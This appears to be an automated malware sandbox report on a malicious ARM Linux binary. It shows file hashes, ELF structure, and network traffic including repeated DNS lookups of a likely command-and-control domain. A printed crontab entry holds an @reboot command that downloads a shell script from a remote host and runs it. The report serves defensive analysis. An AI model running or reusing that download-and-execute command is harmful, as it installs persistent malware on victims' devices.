                                                                                            SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQCvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsJo0:8QjHig8keHLUHYC+GABjnOGAFkz
                                                                                            MD5:62E7751F0D7137F94E0D829BB3164C97
                                                                                            SHA1:ED05AF687349B9637740F90E127EA8A2A89D5AC0
                                                                                            SHA-256:98D049471C07D6A69E688214C2B63EF4BAD163CE1E3B04A56E519F32BF4105A2
                                                                                            SHA-512:0633276DA09B6AD1344B4DF158A46C2090B3271A19A31C8FEE2C2AEB887EBBFEE15C2552AEF81FB2D20AEE5387C6D51B5273FC4E60390F8ECE38083457508DD5
                                                                                            Malicious:true
                                                                                            Reputation:low
                                                                                            Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Sat Oct 26 12:43:28 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                                                                                            File type:ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
                                                                                            Entropy (8bit):6.117336184877317
                                                                                            TrID:
                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                            File name:arm5.elf
                                                                                            File size:75'336 bytes
                                                                                            MD5:c84fca197a6c0d8da1e804407643d901
                                                                                            SHA1:b18d35378928ff15d652cdb21e48d48abac2ffa8
                                                                                            SHA256:b302e2b482811ec560af9f458ad4fa120e6f6d98b0b70a9256c313bfc7d99f51
                                                                                            SHA512:eaed6b072815f9cde6d907a3b13356c982f6fbda66d3893dbb04ee57cd995bd7925d09612a6cf6f738aec6d61440c206bd64cabb935884c302714a2331331532
                                                                                            SSDEEP:1536:Fjr84jhcwmCpuxo7UfezBWKcqE3Ei919UCDZ:Fjr84jSwm47welfcq89E6
                                                                                            TLSH:7D733B85BD819A22C5C121B7FB6F428D772653A8D3EF3203DD25AF20378796B0E67641
                                                                                            File Content Preview:.ELF...a..........(.........4....$......4. ...(...................... ... ............... ... ... .......T..........Q.td..................................-...L."....A..........0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

                                                                                            ELF header

                                                                                            Class:ELF32
                                                                                            Data:2's complement, little endian
                                                                                            Version:1 (current)
                                                                                            Machine:ARM
                                                                                            Version Number:0x1
                                                                                            Type:EXEC (Executable file)
                                                                                            OS/ABI:ARM - ABI
                                                                                            ABI Version:0
                                                                                            Entry Point Address:0x8190
                                                                                            Flags:0x2
                                                                                            ELF Header Size:52
                                                                                            Program Header Offset:52
                                                                                            Program Header Size:32
                                                                                            Number of Program Headers:3
                                                                                            Section Header Offset:74936
                                                                                            Section Header Size:40
                                                                                            Number of Section Headers:10
                                                                                            Header String Table Index:9
                                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                            NULL0x00x00x00x00x0000
                                                                                            .initPROGBITS0x80940x940x180x00x6AX004
                                                                                            .textPROGBITS0x80b00xb00x106480x00x6AX0016
                                                                                            .finiPROGBITS0x186f80x106f80x140x00x6AX004
                                                                                            .rodataPROGBITS0x1870c0x1070c0x19d00x00x2A004
                                                                                            .ctorsPROGBITS0x220e00x120e00x80x00x3WA004
                                                                                            .dtorsPROGBITS0x220e80x120e80x80x00x3WA004
                                                                                            .dataPROGBITS0x220f40x120f40x3840x00x3WA004
                                                                                            .bssNOBITS0x224780x124780x51140x00x3WA004
                                                                                            .shstrtabSTRTAB0x00x124780x3e0x00x0001
                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                            LOAD0x00x80000x80000x120dc0x120dc6.14820x5R E0x8000.init .text .fini .rodata
                                                                                            LOAD0x120e00x220e00x220e00x3980x54ac2.88060x6RW 0x8000.ctors .dtors .data .bss
                                                                                            GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 26, 2024 19:43:34.114602089 CEST341942442192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:43:34.120106936 CEST24423419488.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:43:34.120306015 CEST341942442192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:43:34.120306015 CEST341942442192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:43:34.125703096 CEST24423419488.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:43:34.125765085 CEST341942442192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:43:34.131103992 CEST24423419488.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:43:35.081890106 CEST24423419488.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:43:35.082007885 CEST341942442192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:43:35.082108974 CEST341942442192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:43:40.123620987 CEST5560021798192.168.2.13185.82.200.181
                                                                                            Oct 26, 2024 19:43:40.129074097 CEST2179855600185.82.200.181192.168.2.13
                                                                                            Oct 26, 2024 19:43:40.129125118 CEST5560021798192.168.2.13185.82.200.181
                                                                                            Oct 26, 2024 19:43:40.129143953 CEST5560021798192.168.2.13185.82.200.181
                                                                                            Oct 26, 2024 19:43:40.134643078 CEST2179855600185.82.200.181192.168.2.13
                                                                                            Oct 26, 2024 19:43:40.134687901 CEST5560021798192.168.2.13185.82.200.181
                                                                                            Oct 26, 2024 19:43:40.140116930 CEST2179855600185.82.200.181192.168.2.13
                                                                                            Oct 26, 2024 19:43:43.431020975 CEST2179855600185.82.200.181192.168.2.13
                                                                                            Oct 26, 2024 19:43:43.431097984 CEST5560021798192.168.2.13185.82.200.181
                                                                                            Oct 26, 2024 19:43:43.436522007 CEST2179855600185.82.200.181192.168.2.13
                                                                                            Oct 26, 2024 19:43:48.450426102 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:48.455918074 CEST139355229081.29.149.178192.168.2.13
                                                                                            Oct 26, 2024 19:43:48.456052065 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:48.456052065 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:48.461579084 CEST139355229081.29.149.178192.168.2.13
                                                                                            Oct 26, 2024 19:43:48.461627007 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:48.467046976 CEST139355229081.29.149.178192.168.2.13
                                                                                            Oct 26, 2024 19:43:49.346800089 CEST139355229081.29.149.178192.168.2.13
                                                                                            Oct 26, 2024 19:43:49.346878052 CEST139355229081.29.149.178192.168.2.13
                                                                                            Oct 26, 2024 19:43:49.346898079 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:49.346941948 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:49.346941948 CEST5229013935192.168.2.1381.29.149.178
                                                                                            Oct 26, 2024 19:43:54.359641075 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:43:54.365057945 CEST1700237134193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:43:54.365123034 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:43:54.365163088 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:43:54.370488882 CEST1700237134193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:43:54.370560884 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:43:54.376060009 CEST1700237134193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:43:55.734556913 CEST1700237134193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:43:55.734608889 CEST1700237134193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:43:55.734633923 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:43:55.734714031 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:43:55.734714031 CEST3713417002192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:05.750539064 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:05.756021023 CEST115285901291.149.238.18192.168.2.13
                                                                                            Oct 26, 2024 19:44:05.756083012 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:05.756083012 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:05.762942076 CEST115285901291.149.238.18192.168.2.13
                                                                                            Oct 26, 2024 19:44:05.763000965 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:05.768807888 CEST115285901291.149.238.18192.168.2.13
                                                                                            Oct 26, 2024 19:44:06.588865995 CEST115285901291.149.238.18192.168.2.13
                                                                                            Oct 26, 2024 19:44:06.588903904 CEST115285901291.149.238.18192.168.2.13
                                                                                            Oct 26, 2024 19:44:06.588937044 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:06.589150906 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:06.589152098 CEST5901211528192.168.2.1391.149.238.18
                                                                                            Oct 26, 2024 19:44:11.608109951 CEST469467697192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:11.613526106 CEST769746946193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:44:11.613590956 CEST469467697192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:11.613590956 CEST469467697192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:11.618999004 CEST769746946193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:44:11.619060040 CEST469467697192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:11.624468088 CEST769746946193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:44:12.971379042 CEST769746946193.233.193.45192.168.2.13
                                                                                            Oct 26, 2024 19:44:12.971524000 CEST469467697192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:12.971524000 CEST469467697192.168.2.13193.233.193.45
                                                                                            Oct 26, 2024 19:44:27.996773005 CEST386085241192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:44:28.002196074 CEST52413860831.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:44:28.002298117 CEST386085241192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:44:28.002368927 CEST386085241192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:44:28.008044958 CEST52413860831.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:44:28.008105993 CEST386085241192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:44:28.013515949 CEST52413860831.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:44:28.866971970 CEST52413860831.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:44:28.867207050 CEST386085241192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:44:28.867654085 CEST52413860831.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:44:28.867712975 CEST386085241192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:44:28.872634888 CEST52413860831.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:44:33.955559015 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:33.961148977 CEST255505677691.149.218.232192.168.2.13
                                                                                            Oct 26, 2024 19:44:33.961332083 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:33.961332083 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:33.966921091 CEST255505677691.149.218.232192.168.2.13
                                                                                            Oct 26, 2024 19:44:33.966974974 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:33.972500086 CEST255505677691.149.218.232192.168.2.13
                                                                                            Oct 26, 2024 19:44:34.799051046 CEST255505677691.149.218.232192.168.2.13
                                                                                            Oct 26, 2024 19:44:34.799104929 CEST255505677691.149.218.232192.168.2.13
                                                                                            Oct 26, 2024 19:44:34.799285889 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:34.799340963 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:34.799587011 CEST5677625550192.168.2.1391.149.218.232
                                                                                            Oct 26, 2024 19:44:44.819365978 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:44.824826956 CEST1396041438195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:44.824938059 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:44.824974060 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:44.830331087 CEST1396041438195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:44.830451012 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:44.835819006 CEST1396041438195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:45.741946936 CEST1396041438195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:45.741980076 CEST1396041438195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:45.742114067 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:45.742114067 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:45.742180109 CEST4143813960192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:55.782912016 CEST5846011808192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:55.788964033 CEST1180858460195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:55.789077044 CEST5846011808192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:55.789133072 CEST5846011808192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:55.795032024 CEST1180858460195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:55.795116901 CEST5846011808192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:55.800899982 CEST1180858460195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:56.716825008 CEST1180858460195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:44:56.717116117 CEST5846011808192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:44:56.717117071 CEST5846011808192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:06.741805077 CEST4124218904192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:06.747870922 CEST189044124286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:06.747937918 CEST4124218904192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:06.747950077 CEST4124218904192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:06.753758907 CEST189044124286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:06.753823042 CEST4124218904192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:06.760004044 CEST189044124286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:08.105305910 CEST189044124286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:08.105566025 CEST4124218904192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:08.105566025 CEST4124218904192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:13.146254063 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:13.152450085 CEST2167944186194.87.198.29192.168.2.13
                                                                                            Oct 26, 2024 19:45:13.152569056 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:13.152627945 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:13.159076929 CEST2167944186194.87.198.29192.168.2.13
                                                                                            Oct 26, 2024 19:45:13.159205914 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:13.164870977 CEST2167944186194.87.198.29192.168.2.13
                                                                                            Oct 26, 2024 19:45:14.431816101 CEST2167944186194.87.198.29192.168.2.13
                                                                                            Oct 26, 2024 19:45:14.431843996 CEST2167944186194.87.198.29192.168.2.13
                                                                                            Oct 26, 2024 19:45:14.432064056 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:14.432065010 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:14.432065010 CEST4418621679192.168.2.13194.87.198.29
                                                                                            Oct 26, 2024 19:45:24.476152897 CEST518868022192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:45:24.482259035 CEST80225188688.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:45:24.482372999 CEST518868022192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:45:24.482424021 CEST518868022192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:45:24.488220930 CEST80225188688.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:45:24.488307953 CEST518868022192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:45:24.493866920 CEST80225188688.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:45:25.447520971 CEST80225188688.151.195.22192.168.2.13
                                                                                            Oct 26, 2024 19:45:25.447766066 CEST518868022192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:45:25.447766066 CEST518868022192.168.2.1388.151.195.22
                                                                                            Oct 26, 2024 19:45:35.550162077 CEST357223166192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:35.556143045 CEST31663572286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:35.556211948 CEST357223166192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:35.556255102 CEST357223166192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:35.561978102 CEST31663572286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:35.562037945 CEST357223166192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:35.567804098 CEST31663572286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:36.943133116 CEST31663572286.107.100.80192.168.2.13
                                                                                            Oct 26, 2024 19:45:36.943279028 CEST357223166192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:36.943382025 CEST357223166192.168.2.1386.107.100.80
                                                                                            Oct 26, 2024 19:45:42.030541897 CEST499203477192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:45:42.036287069 CEST34774992031.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:45:42.036484003 CEST499203477192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:45:42.036484957 CEST499203477192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:45:42.041984081 CEST34774992031.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:45:42.042216063 CEST499203477192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:45:42.047637939 CEST34774992031.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:45:42.688757896 CEST34774992031.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:45:42.689312935 CEST499203477192.168.2.1331.13.248.89
                                                                                            Oct 26, 2024 19:45:42.696530104 CEST34774992031.13.248.89192.168.2.13
                                                                                            Oct 26, 2024 19:45:47.723659992 CEST472705079192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:47.729547024 CEST507947270195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:45:47.729654074 CEST472705079192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:47.729717970 CEST472705079192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:47.737620115 CEST507947270195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:45:47.737700939 CEST472705079192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:47.745202065 CEST507947270195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:45:48.641222954 CEST507947270195.133.92.51192.168.2.13
                                                                                            Oct 26, 2024 19:45:48.641433001 CEST472705079192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:48.641433001 CEST472705079192.168.2.13195.133.92.51
                                                                                            Oct 26, 2024 19:45:53.704478979 CEST5500018471192.168.2.13213.182.204.57
                                                                                            Oct 26, 2024 19:45:53.710308075 CEST1847155000213.182.204.57192.168.2.13
                                                                                            Oct 26, 2024 19:45:53.710573912 CEST5500018471192.168.2.13213.182.204.57
                                                                                            Oct 26, 2024 19:45:53.710573912 CEST5500018471192.168.2.13213.182.204.57
                                                                                            Oct 26, 2024 19:45:53.716676950 CEST1847155000213.182.204.57192.168.2.13
                                                                                            Oct 26, 2024 19:45:53.716865063 CEST5500018471192.168.2.13213.182.204.57
                                                                                            Oct 26, 2024 19:45:53.723203897 CEST1847155000213.182.204.57192.168.2.13
                                                                                            Oct 26, 2024 19:46:03.712982893 CEST5500018471192.168.2.13213.182.204.57
                                                                                            Oct 26, 2024 19:46:03.718873978 CEST1847155000213.182.204.57192.168.2.13
                                                                                            Oct 26, 2024 19:46:03.980566025 CEST1847155000213.182.204.57192.168.2.13
                                                                                            Oct 26, 2024 19:46:03.981029987 CEST5500018471192.168.2.13213.182.204.57
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Oct 26, 2024 19:43:29.062110901 CEST3522653192.168.2.13139.84.165.176
                                                                                            Oct 26, 2024 19:43:29.311291933 CEST4345553192.168.2.13139.84.165.176
                                                                                            Oct 26, 2024 19:43:34.068217039 CEST4533653192.168.2.1380.152.203.134
                                                                                            Oct 26, 2024 19:43:34.113245010 CEST534533680.152.203.134192.168.2.13
                                                                                            Oct 26, 2024 19:43:34.316016912 CEST6094553192.168.2.1380.152.203.134
                                                                                            Oct 26, 2024 19:43:34.406843901 CEST536094580.152.203.134192.168.2.13
                                                                                            Oct 26, 2024 19:43:34.408687115 CEST4282053192.168.2.1365.21.1.106
                                                                                            Oct 26, 2024 19:43:34.436058998 CEST534282065.21.1.106192.168.2.13
                                                                                            Oct 26, 2024 19:43:36.950253010 CEST5663553192.168.2.131.1.1.1
                                                                                            Oct 26, 2024 19:43:36.950311899 CEST5282253192.168.2.131.1.1.1
                                                                                            Oct 26, 2024 19:43:36.957643986 CEST53528221.1.1.1192.168.2.13
                                                                                            Oct 26, 2024 19:43:36.959196091 CEST53566351.1.1.1192.168.2.13
                                                                                            Oct 26, 2024 19:43:40.091957092 CEST4505053192.168.2.1381.169.136.222
                                                                                            Oct 26, 2024 19:43:40.119837046 CEST534505081.169.136.222192.168.2.13
                                                                                            Oct 26, 2024 19:43:48.433204889 CEST4952653192.168.2.1351.158.108.203
                                                                                            Oct 26, 2024 19:43:48.449857950 CEST534952651.158.108.203192.168.2.13
                                                                                            Oct 26, 2024 19:43:54.348582983 CEST6042653192.168.2.13152.53.15.127
                                                                                            Oct 26, 2024 19:43:54.359203100 CEST5360426152.53.15.127192.168.2.13
                                                                                            Oct 26, 2024 19:44:00.735788107 CEST3372553192.168.2.1370.34.254.19
                                                                                            Oct 26, 2024 19:44:05.739015102 CEST4822353192.168.2.13194.36.144.87
                                                                                            Oct 26, 2024 19:44:05.750216961 CEST5348223194.36.144.87192.168.2.13
                                                                                            Oct 26, 2024 19:44:11.590404987 CEST3715453192.168.2.1351.158.108.203
                                                                                            Oct 26, 2024 19:44:11.607656002 CEST533715451.158.108.203192.168.2.13
                                                                                            Oct 26, 2024 19:44:17.974035025 CEST5430053192.168.2.1370.34.254.19
                                                                                            Oct 26, 2024 19:44:22.979434013 CEST5138553192.168.2.13139.84.165.176
                                                                                            Oct 26, 2024 19:44:27.984721899 CEST5199653192.168.2.13202.61.197.122
                                                                                            Oct 26, 2024 19:44:27.995919943 CEST5351996202.61.197.122192.168.2.13
                                                                                            Oct 26, 2024 19:44:33.870857954 CEST4658353192.168.2.1380.152.203.134
                                                                                            Oct 26, 2024 19:44:33.954674006 CEST534658380.152.203.134192.168.2.13
                                                                                            Oct 26, 2024 19:44:39.804272890 CEST5403953192.168.2.135.161.109.23
                                                                                            Oct 26, 2024 19:44:44.808007956 CEST3912753192.168.2.13194.36.144.87
                                                                                            Oct 26, 2024 19:44:44.818495035 CEST5339127194.36.144.87192.168.2.13
                                                                                            Oct 26, 2024 19:44:50.747090101 CEST5156653192.168.2.13178.254.22.166
                                                                                            Oct 26, 2024 19:44:55.753297091 CEST5247953192.168.2.13217.160.70.42
                                                                                            Oct 26, 2024 19:44:55.781477928 CEST5352479217.160.70.42192.168.2.13
                                                                                            Oct 26, 2024 19:45:01.721810102 CEST3601353192.168.2.1364.176.6.48
                                                                                            Oct 26, 2024 19:45:06.728720903 CEST6022253192.168.2.13202.61.197.122
                                                                                            Oct 26, 2024 19:45:06.740375996 CEST5360222202.61.197.122192.168.2.13
                                                                                            Oct 26, 2024 19:45:13.110016108 CEST5649153192.168.2.13217.160.70.42
                                                                                            Oct 26, 2024 19:45:13.144752979 CEST5356491217.160.70.42192.168.2.13
                                                                                            Oct 26, 2024 19:45:19.436923027 CEST4947053192.168.2.13178.254.22.166
                                                                                            Oct 26, 2024 19:45:24.440583944 CEST5847153192.168.2.13185.181.61.24
                                                                                            Oct 26, 2024 19:45:24.474996090 CEST5358471185.181.61.24192.168.2.13
                                                                                            Oct 26, 2024 19:45:30.451375008 CEST6027253192.168.2.13139.84.165.176
                                                                                            Oct 26, 2024 19:45:35.459011078 CEST4458753192.168.2.13168.235.111.72
                                                                                            Oct 26, 2024 19:45:35.549153090 CEST5344587168.235.111.72192.168.2.13
                                                                                            Oct 26, 2024 19:45:41.948756933 CEST3374353192.168.2.1380.152.203.134
                                                                                            Oct 26, 2024 19:45:42.028717041 CEST533374380.152.203.134192.168.2.13
                                                                                            Oct 26, 2024 19:45:47.694334984 CEST4979253192.168.2.1365.21.1.106
                                                                                            Oct 26, 2024 19:45:47.721755981 CEST534979265.21.1.106192.168.2.13
                                                                                            Oct 26, 2024 19:45:53.646575928 CEST4081053192.168.2.13194.36.144.87
                                                                                            Oct 26, 2024 19:45:53.702656984 CEST5340810194.36.144.87192.168.2.13
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Oct 26, 2024 19:43:29.062110901 CEST192.168.2.13139.84.165.1760x46b9Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:34.068217039 CEST192.168.2.1380.152.203.1340x18efStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:36.950253010 CEST192.168.2.131.1.1.10x7059Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:36.950311899 CEST192.168.2.131.1.1.10x407aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:40.091957092 CEST192.168.2.1381.169.136.2220x18feStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:48.433204889 CEST192.168.2.1351.158.108.2030xb1feStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:43:54.348582983 CEST192.168.2.13152.53.15.1270xfd81Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:00.735788107 CEST192.168.2.1370.34.254.190xb7deStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:05.739015102 CEST192.168.2.13194.36.144.870x9464Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:11.590404987 CEST192.168.2.1351.158.108.2030x1274Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:17.974035025 CEST192.168.2.1370.34.254.190x1d84Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:22.979434013 CEST192.168.2.13139.84.165.1760x5519Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:27.984721899 CEST192.168.2.13202.61.197.1220x2103Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:33.870857954 CEST192.168.2.1380.152.203.1340xc48Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:39.804272890 CEST192.168.2.135.161.109.230xd3fdStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:44.808007956 CEST192.168.2.13194.36.144.870xf95aStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:50.747090101 CEST192.168.2.13178.254.22.1660x414bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:44:55.753297091 CEST192.168.2.13217.160.70.420x504eStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:01.721810102 CEST192.168.2.1364.176.6.480x9d0bStandard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
                                                                                            Oct 26, 2024 19:45:06.728720903 CEST192.168.2.13202.61.197.1220xd7a4Standard query (0)kingstonwikkerink.dynA (IP address)IN (0x0001)false
